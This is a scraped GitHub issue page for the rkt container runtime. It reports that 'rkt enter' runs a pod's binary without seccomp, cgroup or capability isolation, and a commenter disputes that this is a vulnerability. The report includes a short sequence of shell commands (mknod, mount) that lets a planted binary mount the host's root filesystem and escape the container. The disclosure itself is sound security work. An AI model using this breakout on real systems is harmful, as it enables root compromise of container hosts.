Comments (2)
Consider the following scenario:
- An attacker who compromised a rkt pod wishes to compromise the host
- The attacker substitutes
/bin/bash
inside the container with a malicious binary - A rkt user runs
rkt enter ${pod-id} bash
- The malicious binary is executed inside the container, but without several necessary isolation features (seccomp, cgroups, all capabilities). Thus the malicious binary can break out of the container and the attacker can run arbitrary code on the host as root.
To break out of the container, the malicious binary can run the following commands:
stat / | grep "Device" | awk '{print $2}' # get the minor and major numbers of the root fs device
mknod --mode 0600 /dev/host_root_fs_device b ${major-num} ${minor-num}
mkdir /host_root
mount /dev/host_root_fs_device /host_root
See this POC video. For more details see this post.
from rkt.
I do not understand how this is a vulnerability. rkt enter
is an interactive root-only command (requires sudo
or root access). IMHO interactive root session started by admin (e.g. to enter container for inspection, etc.) should not be restricted.
from rkt.
Related Issues (20)
- update vendored "github.com/cznic/..."
- rkt-1.30.0 with lkvm stage1: builtin-run.c:412:28: error: ā%sā directive output may be truncated writing up to 4095 bytes into a region of size 4091 [-Werror=format-truncation=] HOT 1
- Self-built stage1 host image using wrong systemd path HOT 1
- [Question] Common procedures for dealing with crashes from docker containers in rkt HOT 2
- rkt container not running on raspberrypi 3
- Expired key for deb.asc files HOT 5
- tests: TestFetchNoStoreCacheControl fails on SemaphoreCI HOT 1
- rkt can be tricked into executing helper binaries inside pods
- make unit-check fails HOT 1
- FYI: Archiving Rkt in CNCF HOT 2
- gc: Add --quiet flag
- Unable to fetch ubuntu 16.04 image
- Suggestion: Continuous Fuzzing
- rkt downloads and extracts every docker image layer
- rkt have some Problems with SELinux in Enforce Mode
- Can't specify tags in urls on official docker images HOT 1
- broken by Golang 1.13: extracttar error HOT 1
- rkt run docker's image mysql, error
- Ending and archiving the rkt project HOT 5
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
š Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. ššš
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ā¤ļø Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from rkt.